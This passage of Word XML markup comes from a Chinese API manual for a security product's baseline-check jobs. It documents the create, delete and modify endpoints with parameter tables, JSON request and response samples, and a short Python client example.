      <w:tr w:rsidR="00497C54" w14:paraId="6DDBCD69" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62EDDEE3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A8C8786" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C381072" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>kind=0时必填，所选主机列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2E540465" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="246439D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="340BE152" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46CFD610" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>kind=1时必填，所选业务组列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="42E04C66" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="683975B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ruleId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F653A27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6974DA1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>必填，基线规则id，规则平台上查询id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="74DBAAFE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31DFB1EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronEnabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DB9DF3C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EB5F098" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>必填，是否定时任务 true-定时任务 false-普通任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3FA87947" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A3BBFD2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cron</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="513AA458" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51BFA1A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronEnabled=true必填，cron任务表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="01B665E0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D415FD3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="100602FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51AD5583" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D6EE956" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FA7378" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "name": "test_001",  //必填，任务名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "kind": 1,  //必填，范围类型 0-主机 1-业务组 2-全部</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "values": ["407c1dd87b1d7771"],  //kind=0时必填，所选主机列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">       "groups": [1, 3, 446],  //kind=1时必填，所选业务组列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "ruleId": "1b8094cf2cacf0e42acf",  //必填，基线规则id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "cronEnabled": false,  //必填，是否定时任务 true-定时任务 false-普通任务</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "cron": "0 17 * * *",  //cronEnabled=true必填，cron任务表达式</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "description": "xxx"  //任务描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2C8A4D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C27F4B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> "status":"success",//任务创建状态</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "id": "xxxx" //任务specId</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009A397D"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788"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="560DA5F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79C30B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E051705" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="245117E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="548981EE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64A5F543" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DBEEC12" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30735B7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务创建状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5207D7F2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A4A7827" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55F05133" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F67F3FB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务specId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11F4512F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DB2B9F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#! /usr/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import httplib</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>host = "127.0.0.1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>port = 80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t># 创建基线任务示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def create_baseline_spec():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = httplib.HTTPConnection(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/baseline/job/linux" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    body = {"name": "test_spec","kind": 2,"values":[],"groups": [],"ruleId": "1b8094cf2cacf0e42acf","cronEnabled": false,"cron": "","description": "123"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    payload = json.dumps(body)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    headers = {'Content-Type': "application/json"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn.request("POST", url, data=payload, headers=headers)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = conn.getresponse()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print(response.text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472571C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="179" w:name="删除任务"/>
      <w:bookmarkEnd w:id="178"/>
      <w:r>
        <w:t>删除任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028A417A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFE8D8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE /external/api/baseline/job/{linux，win}/{specId}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C896F2F"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836"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1279"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="49E4076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F7B2C70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1364B57F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19937B0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="79BC2150" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BFD9D70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>specId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B8DBE68" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67CE8B1F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务specId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41570056" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B4A9E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  "specId": "xxxx" //任务specId</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE6C168" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11969F5B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  "status":"success",//删除结果</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">         "id": "xxxx" //任务specId</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6C211A"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788"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1279"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5BF04A4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13EC162" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F8D8565" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="534367C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0BFACCA0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C5E669A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C92EF7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BFAB4E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>删除结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="282F25C0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F88CD59" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E3AA427" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AB83753" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务specId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33C7EBE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="180" w:name="修改任务请求"/>
      <w:bookmarkEnd w:id="179"/>
      <w:r>
        <w:t>修改任务请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B0C1E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730B6001" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>PUT /external/api/baseline/job/{linux，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166F0332"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423"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="4777"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2B8FC6E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BDA6051" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43ADE462" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="011F5F18" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7BD340D6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45CD7131" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="757C46C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BB3CD2E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务名，必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="35B66938" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="726B5DDB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>specId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BFC8E2D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42E71250" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务specId，必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7353BE3E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31EF613C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronEnabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4772171C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EED5E9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>必填，是否定时任务 true-定时任务 false-普通任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
